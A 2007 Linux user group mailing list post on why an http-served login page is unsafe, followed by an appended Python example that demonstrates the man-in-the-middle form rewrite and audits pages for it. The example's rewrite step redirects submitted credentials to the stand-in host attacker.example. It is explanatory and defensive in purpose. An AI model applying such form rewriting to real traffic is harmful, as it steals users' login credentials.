ARP-spoofing defense
Michael L Torrie
torriem at chem.byu.edu
Mon Mar 19 08:55:23 MDT 2007
On Mon, 2007-03-19 at 08:34 -0600, Brandon Stout wrote:
> I avoid banks - go Credit Unions! Bank is, after all, a 4 letter
> word... Most banks and credit unions use http for the front page and
> other public pages. Encryption increases bandwidth usage, so for
> large banks this makes sense. When you submit your password, it
> switches to https to encrypt your user name/password combo. Use a
> packet sniffer to make sure, but usually, even when the login page is
> http, your password will get sent https.
You missed the point. If the main page that contains the username and
password field is served using normal http, then a malicious man-in-the-
middle can alter the form and send your username and password to a third
party, all without messing with SSL certificates. Topher has written
code to do this on a LAN.
Michael
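The form-rewriting attack Michael describes, and the check a user can run against the page they actually received, as an added example that is not part of the original thread or Topher's code. The HTML page is constructed for the example, and the hostnames bank.example and attacker.example are assumed, not taken from the thread.

```python
"""
Added example (not from the original thread): a login form delivered over
plain http can be rewritten in transit so the browser POSTs the credentials
elsewhere, with no certificate involved; and a client-side audit that flags
a login page which is open to that rewrite.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: a front page served over http:// whose login form
# posts to https://, the pattern the quoted reply calls safe.
ORIGINAL_PAGE = """<html><body>
<form id="login" method="post" action="https://bank.example/login">
  <input name="user"><input name="pass" type="password">
  <input type="submit" value="Log in">
</form></body></html>"""


def rewrite_form_action(html: str, new_action: str) -> str:
    """What the man-in-the-middle does to the plaintext response: replace
    the first form's action so the browser submits the filled-in fields to
    new_action. The https target of the original action never matters,
    because the page naming it arrived unauthenticated over http."""
    return re.sub(r'(<form\b[^>]*\baction=")[^"]*(")',
                  lambda m: m.group(1) + new_action + m.group(2),
                  html, count=1, flags=re.IGNORECASE)


class _FormCollector(HTMLParser):
    """Collect each <form>'s action and whether it carries a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def audit_login_page(page_url: str, html: str) -> list:
    """Return the reasons a login page cannot be trusted against a LAN
    man-in-the-middle. An empty list means the page itself and every
    password form on it go over https to the same host the page came from.
    page_url is the URL the browser actually loaded (scheme included)."""
    problems = []
    page = urlparse(page_url)
    if page.scheme != "https":
        problems.append("page served over %s: anyone in the path can rewrite "
                        "the form before you see it" % page.scheme)
    collector = _FormCollector()
    collector.feed(html)
    for form in collector.forms:
        if not form["password"]:
            continue
        target = urlparse(urljoin(page_url, form["action"]))
        if target.scheme != "https":
            problems.append("password form posts over %s to %s"
                            % (target.scheme, target.netloc))
        elif target.netloc != page.netloc:
            problems.append("password form posts to a different host: %s"
                            % target.netloc)
    return problems


if __name__ == "__main__":
    # The form looks safe in isolation, but the http page carrying it is not.
    print(audit_login_page("http://bank.example/", ORIGINAL_PAGE))
    # After the in-transit rewrite the same audit names the third party.
    tampered = rewrite_form_action(ORIGINAL_PAGE, "https://attacker.example/collect")
    print(audit_login_page("http://bank.example/", tampered))
```

The audit only inspects what the browser received, so an attacker who can rewrite the form can also strip any such check delivered in the same page; it is a way to see the problem, not a defense. The defense is the one the thread points at: the page carrying the login form has to be served over https itself, so the form action is covered by the certificate rather than by whatever the last hop on the LAN chose to send.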
More information about the PLUG mailing list